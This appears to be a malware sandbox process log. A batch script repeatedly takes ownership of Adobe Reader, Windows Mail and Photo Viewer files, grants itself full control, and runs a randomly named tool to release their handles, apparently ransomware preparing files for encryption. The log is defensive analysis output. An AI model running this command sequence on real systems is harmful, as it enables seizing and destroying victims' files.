-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "brt04.hsp" -nobanner3⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "brt04.hsp" -nobanner4⤵PID:940
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:2016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:1112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "can32.clx" -nobanner3⤵PID:972
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "can32.clx" -nobanner4⤵PID:1040
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:1068
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:1868
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:1348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "usa37.hyp" -nobanner3⤵PID:1676
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "usa37.hyp" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""2⤵PID:1128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C3⤵PID:1872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵PID:1076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CROATIAN.TXT" -nobanner3⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CROATIAN.TXT" -nobanner4⤵PID:1548
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵PID:1472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "TURKISH.TXT" -nobanner3⤵PID:972
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "TURKISH.TXT" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:1800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:1808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵
- Modifies file permissions
PID:1792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:1676
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:1740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:1972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:1276
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵PID:1008
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C3⤵PID:532
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵PID:1120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "forms_super.gif" -nobanner3⤵PID:972
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "forms_super.gif" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵PID:896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵
- Modifies file permissions
PID:1372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "reviews_joined.gif" -nobanner3⤵PID:796
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "reviews_joined.gif" -nobanner4⤵PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵
- Modifies file permissions
PID:1276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "rss.gif" -nobanner3⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "rss.gif" -nobanner4⤵PID:1128
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:1052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵PID:232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "tr.gif" -nobanner3⤵PID:1956
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "tr.gif" -nobanner4⤵PID:208
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:1092
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:212
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:608
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵
- Modifies file permissions
PID:1128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:1212
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:1872
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:1152
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:1040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵PID:208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:236
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵PID:1560
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C3⤵PID:1836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"3⤵PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "ZY______.PFB" -nobanner3⤵PID:1548
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "ZY______.PFB" -nobanner4⤵PID:948
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵PID:1984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:1500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵PID:1872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "brt.fca" -nobanner3⤵PID:532
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "brt.fca" -nobanner4⤵PID:620
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:1112
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:1624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵
- Modifies file permissions
PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "can03.ths" -nobanner3⤵PID:568
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "can03.ths" -nobanner4⤵PID:1068
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""2⤵PID:820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C3⤵PID:216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"3⤵PID:948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "usa03.hsp" -nobanner3⤵PID:864
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "usa03.hsp" -nobanner4⤵PID:1676
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:1076
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:1976
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵
- Modifies file permissions
PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:1052
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:960
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:1284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:1144
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵
- Modifies file permissions
PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:888
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:972
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:2032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵
- Modifies file permissions
PID:1676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:1276
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1128
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵PID:960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1040
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:1656
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:2016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵PID:204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1092
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:236
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "wabmig.exe" -nobanner3⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "wabmig.exe" -nobanner4⤵PID:616
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:1052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:1872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵
- Modifies file permissions
PID:1076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "wab.exe" -nobanner3⤵PID:1624
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "wab.exe" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:1836
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:1092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "directories.acrodata" -nobanner3⤵PID:1372
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "directories.acrodata" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:820
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:1872
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:1276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
PID:1212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:856
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""2⤵PID:1284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:2016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"3⤵PID:1372
-
-
